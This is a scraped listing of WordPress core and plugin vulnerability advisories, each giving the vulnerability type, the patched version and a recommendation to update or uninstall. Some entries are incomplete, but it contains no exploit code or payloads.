Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.16
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.16, 3.8.16, 3.9.14, 4.0.13, 4.1.13, 4.2.10, 4.3.6, 4.4.5, 4.5.4, 4.6.1

Plugin: Support Board

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Comment Guestbook

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Authenticated (Vendor+) Stored Cross-Site Scripting
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Ultimate Gift Cards for WooCommerce – Create WooCommerce Gift Cards, Gift Vouchers, Redeem & Manage Digital Gift Coupons. Offer Gift Certificates, Schedule Gift Cards, and Use Advance Coupons With Personalized Templates

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: SpiderCalendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.65
Recommended Action: Update to version 1.6.65, or a newer patched version

Plugin: Local Weather

Plugin: LWS Tools

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: WPBakery Page Builder Clipboard

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.5.6
Recommended Action: Update to version 4.5.6, or a newer patched version

Plugin: miwoftp

Vulnerability: Arbitrary File Download
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Plugin Names
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.7.7
Recommended Action: Update to version 6.7.7, or a newer patched version

Plugin: FormCraft

Vulnerability: Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Charts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FormBuilder

Plugin: Wp-Insert

Vulnerability: Arbitrary File Upload
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Slider Hero with Video Background, Animation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 8.4.4
Recommended Action: Update to version 8.4.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.35
Recommended Action: Update to version 1.5.35, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Missing Authorization via CR_Manual
Patched Version: 5.38.2
Recommended Action: Update to version 5.38.2, or a newer patched version

Plugin: SearchWP Live Ajax Search

Vulnerability: Directory Traversal and Local File Inclusion
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Shared Files – Frontend File Upload Form & Secure File Sharing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.57
Recommended Action: Update to version 1.6.57, or a newer patched version

Plugin: Sermon Browser

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.12.1
Recommended Action: Update to version 8.12.1, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Authorization Bypass
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Privilege Escalation via updraft_central_ajax_handler
Patched Version: 1.23.3
Recommended Action: Update to one of the following versions, or a newer patched version: 1.23.3, 2.23.3

Plugin: Link Library

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.2.9
Recommended Action: Update to version 7.2.9, or a newer patched version

Plugin: Premium Addons for Elementor

Vulnerability: No subtitle
Patched Version: 4.2.8
Recommended Action: Update to version 4.2.8, or a newer patched version

Plugin: Posts to Page

Plugin: Read and Understood

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.226
Recommended Action: Update to version 2.0.226, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: Shoppable Images

Vulnerability: Cross Site Request Forgery
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: WP Remote Users Sync

Vulnerability: Authenticated (Subscriber+) Server Side Request Forgery
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Flexi – Guest Submit

Vulnerability: Guest Submit < 4.20
Patched Version: 4.20
Recommended Action: Update to version 4.20, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘notice’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WP Remote Users Sync

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Log View
Patched Version: 1.2.12
Recommended Action: Update to version 1.2.12, or a newer patched version

Plugin: Ultimate Reviews

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.0.16
Recommended Action: Update to version 3.0.16, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: SQL Injection
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Improved user search in backend

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Bootstrap Shortcodes Ultimate

Plugin: Discussion Board – WordPress Forum Plugin

Vulnerability: Authenticated (Subscriber+) Content Injection
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: VigilanTor

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Plugin: HTML5 MP3 Player with Playlist Free

Vulnerability: Authenticated (Author+) PHP Object Injecton
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Insecure Direct Object Reference to Order Manipulation
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Timely Booking Button

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.9.44
Recommended Action: Update to version 2.9.44, or a newer patched version

Plugin: Event Tickets with Ticket Scanner

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Autolinks Manager – SEO Auto Linker

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.05
Recommended Action: Update to version 1.10.05, or a newer patched version

Plugin: WooCommerce

Vulnerability: Unauthorized Order Status Change
Patched Version: 3.5.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.5.10, 3.6.7, 3.7.3, 3.8.3, 3.9.5, 4.0.4, 4.1.4, 4.2.5, 4.3.6, 4.4.4, 4.5.5, 4.6.5, 4.7.4, 4.8.3, 4.9.5, 5.0.3, 5.1.3, 5.2.5, 5.3.3, 5.4.4, 5.5.4, 5.6.2, 5.7.2, 5.8.1, 5.9.1, 6.0.1, 6.1.2, 6.2.2, 6.3.1

Plugin: WooCommerce

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Arbitrary Post Access via Shortcode
Patched Version: 5.12.8
Recommended Action: Update to version 5.12.8, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Authenticated Arbitrary Plugin Installation
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Memphis Documents Library

Vulnerability: Local File Inclusion
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Responsive Plus – Starter Templates, Advanced Features and Customizer Settings for Responsive Theme.

Vulnerability: Unprotected AJAX Actions
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Missing Authorization on ‘load_hcaptcha_preview’ AJAX function
Patched Version: 1.23.3
Recommended Action: Update to version 1.23.3, or a newer patched version

Plugin: Code Embed

Vulnerability: Authenticated(Contributor+) Denial of Service
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Curtain

Vulnerability: Unauthenticated Maintenance Mode Enabled/Disable
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Waiting: One-click countdowns

Plugin: Webcam Video Conference

Vulnerability: Unrestricted File Upload leading to Remote Code Execuction
Patched Version: 4.91.9
Recommended Action: Update to version 4.91.9, or a newer patched version

Plugin: Post Connector

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Page Builder with Image Map by AZEXO

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via azh_save
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Activity Log

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Core: WordPress

Vulnerability: Information Disclosure (Multi-Part Email Leak)
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Sign-up Sheets

Vulnerability: Authenticated CSV Injection
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Mobile Address Bar Changer

Plugin: Cost Calculator

Vulnerability: Authenticated Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Authenticated Stored Cross-Site Scripting via Advert Names
Patched Version: 5.8.23
Recommended Action: Update to version 5.8.23, or a newer patched version

Plugin: Peter’s Random Anti-Spam Image

Plugin: Blog Grid & Post Grid – Blog Post Slider, Blog Post Carousel, Blog Post Ticker, Blog Post Masonry, Category Post Grid By News & Blog Designer Pack

Vulnerability: Unauthenticated Remote Code Execution via Local File Inclusion
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Chat Button & Custom ChatGPT-Powered Bot by GetButton.io

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.8.10
Recommended Action: Update to version 1.8.10, or a newer patched version

Plugin: DX-auto-save-images

Plugin: Web Instant Messenger

Plugin: Kento Post View Counter

Plugin: WP Forms Puzzle Captcha

Plugin: Inactive User Deleter

Vulnerability: Cross-Site Request Forgery via Multiple Functions
Patched Version: 1.60
Recommended Action: Update to version 1.60, or a newer patched version

Plugin: Social Sharing Plugin – Kiwi

Vulnerability: Arbitrary Options Update
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Accept Stripe Payments

Vulnerability: Unauthenticated Content Injection
Patched Version: 2.0.80
Recommended Action: Update to version 2.0.80, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3.1
Recommended Action: Update to version 1.8.3.1, or a newer patched version

Plugin: YOP Poll

Vulnerability: Author+ Stored Cross-Site Scripting via Preview Module
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: cformsII

Vulnerability: Authenticated SQL Injection
Patched Version: 14.13
Recommended Action: Update to version 14.13, or a newer patched version

Plugin: WooCommerce Bulk Stock Management

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.34
Recommended Action: Update to version 2.2.34, or a newer patched version

Plugin: Google Map Shortcode

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: PHAR Deserialization
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Affiliate Ads for Clickbank Products

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Saan World Clock

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.21
Recommended Action: Update to version 4.3.21, or a newer patched version

Plugin: Simple Share Buttons Adder

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: WP Simple Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.8.5
Recommended Action: Update to version 2.0.8.5, or a newer patched version

Plugin: wp tell a friend popup form

Vulnerability: Cross-Site Request Forgery via ‘TellAFriend_admin’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Checkout Files Upload for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Slideshow

Plugin: GI-Media Library

Vulnerability: Directory Traversal
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Table Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Constant Contact Forms by MailMunch

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authentication Bypass
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Logo Slider

Plugin: WordPress Uninstall

Vulnerability: Cross-Site Request Forgery to Site Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.11
Recommended Action: Update to version 4.1.11, or a newer patched version

Plugin: Simply Exclude

Plugin: HT Easy GA4 – Google Analytics WordPress Plugin

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WordPress Poll

Plugin: Smash Balloon Social Post Feed – Simple Social Feeds for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Get your number

Plugin: Fotomoto

Plugin: ResponsiveVoice Text To Speech

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Unauthenticated Arbitrary Settings Update
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: PDF File Browser

Plugin: WP Armour – Honeypot Anti Spam

Vulnerability: No subtitle
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: PowerPack Pro for Elementor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.24
Recommended Action: Update to version 2.9.24, or a newer patched version

Plugin: Ricerca – advanced search

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortocde
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: copy-me

Vulnerability: Missing Authorization & Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Request Forgery via save_campaign_preview
Patched Version: 3.1.19
Recommended Action: Update to version 3.1.19, or a newer patched version

Plugin: SearchIQ – The Search Solution

Vulnerability: Missing Authorization via getSIQPluginSettings
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Dave's WordPress Live Search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Plugin Deactivation and Deletion Errors
Patched Version: 3.7.39
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.39, 3.8.39, 3.9.37, 4.0.36, 4.1.36, 4.2.33, 4.3.29, 4.4.28, 4.5.27, 4.6.24, 4.7.24, 4.8.20, 4.9.21, 5.0.17, 5.1.14, 5.2.16, 5.3.13, 5.4.11, 5.5.10, 5.6.9, 5.7.7, 5.8.5, 5.9.4, 6.0.2

Plugin: WordPress Comments Import & Export

Vulnerability: CSV Injection
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 2.11.6
Recommended Action: Update to version 2.11.6, or a newer patched version

Plugin: 1app Business Forms

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Wp-Pro-Quiz

Vulnerability: Arbitrary Quiz Deletion via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EasyRotator for WordPress – Slider Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Verified Reviews (Avis Vérifiés)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.15
Recommended Action: Update to version 2.3.15, or a newer patched version

Plugin: Login by Auth0

Vulnerability: CSV Injection
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: BestWebSoft's Like & Share – Posts, Pages and Widget Social Extension plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery Filesystem Credential Update
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: MainWP Article Uploader Extension

Vulnerability: Authenticated (Subscriber+) Arbitrary File Deletion
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: QueryWall: Plug'n Play Firewall

Plugin: Simple Photo Gallery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: Vertical scroll recent post

Vulnerability: Cross-Site Request Forgery via vsrp_admin_options
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Regenerate & Select Crop

Vulnerability: Sensitive Information Exposure
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: Leaflet Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Sp*tify Play Button for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.08
Recommended Action: Update to version 2.08, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Finalist

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: WPC Smart Wishlist for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Jobs for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.5.11
Recommended Action: Update to version 2.5.11, or a newer patched version

Plugin: Testimonial Slider Shortcode

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting Vulnerability via Shortcode
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Instant CSS

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Plugmatter Optin Feature Box

Vulnerability: SQL Injection
Patched Version: 2.0.14
Recommended Action: Update to version 2.0.14, or a newer patched version

Plugin: WP-ViperGB

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Plugin: Stylish Cost Calculator – Quote Generator, Lead Gen & Price Estimator

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.0.4
Recommended Action: Update to version 7.0.4, or a newer patched version

Plugin: Gallery from files

Plugin: Count per Day

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Pretty Link Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Bitcoin / Altcoin Faucet

Plugin: Burst Statistics – Privacy-Friendly Analytics for WordPress

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: TinyMCE Custom Styles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via option_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: WP Image Zoom

Vulnerability: Cross-Site Request Forgery to Denial of Service
Patched Version: 1.24
Recommended Action: Update to version 1.24, or a newer patched version

Plugin: Hermit 音乐播放器

Plugin: Polls CP

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: WP-CRM – Customer Relations Management for WordPress

Vulnerability: CSV injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: Clone

Vulnerability: Cross-Site Request Forgery via wp_ajax_tifm_save_decision
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.12
Recommended Action: Update to version 1.4.12, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Multiple Cross-Site Scripting Issues
Patched Version: 1.5.46
Recommended Action: Update to version 1.5.46, or a newer patched version

Plugin: LWS Tools

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Database Collation Fix

Vulnerability: Cross-Site Request Forgery via admin_page
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: BuddyPress

Vulnerability: Insufficient Privilege De-escalation
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: salient-core

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: eRoom – Zoom Meetings & Webinars

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: PDF Viewer & 3D PDF Flipbook – DearPDF

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: SQL Injection
Patched Version: 13.1.0.6
Recommended Action: Update to version 13.1.0.6, or a newer patched version

Plugin: Social Sharing Toolkit

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Art Direction

Plugin: Mail Bank – #1 Mail SMTP Plugin for WordPress

Vulnerability: #1 Mail SMTP Plugin for WordPress <= 4.0.14
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: JobCareer | Job Board Responsive WordPress Theme

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Personal Dictionary – Vocabulary Games, Memory Games

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: WPForms Pro

Vulnerability: 1.8.5.3
Patched Version: 1.8.5.4
Recommended Action: Update to version 1.8.5.4, or a newer patched version

